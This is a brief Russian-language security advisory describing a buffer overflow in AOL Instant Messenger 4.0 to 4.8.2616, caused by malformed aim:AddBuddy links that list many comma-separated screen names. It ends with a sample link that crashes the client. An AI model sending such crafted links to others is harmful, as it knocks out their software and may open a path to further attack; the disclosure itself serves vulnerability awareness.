AOL Instant Messenger (AIM) - служба передачи мгновенных сообщений.
Переполнение буфера происходит при обработке некорректных гиперссылок aim:AddBuddy. Если жертва кликнет на гиперссылку
AddBuddy состоящую из множества запятых, разграничивающих ScreenName, произойдет аварийное завершение работы программы. Неизвестно, может ли уязвимость использоваться для выполнения произвольного кода.
Уязвимость обнаружена в AOL Instant Messenger 4.0- 4.8.2616.
Пример:
aim:AddBuddy? ScreenName=InterWN,InterWN,InterWN,InterWN,
InterWN,InterWN,InterWN, InterWN,InterWN,InterWN, InterWN,InterWN&groupname=Int
erWN, InterWN,InterWN,InterWN,InterWN, InterWN,InterWN,InterWN ,InterWN,InterWN,InterWN,InterWN
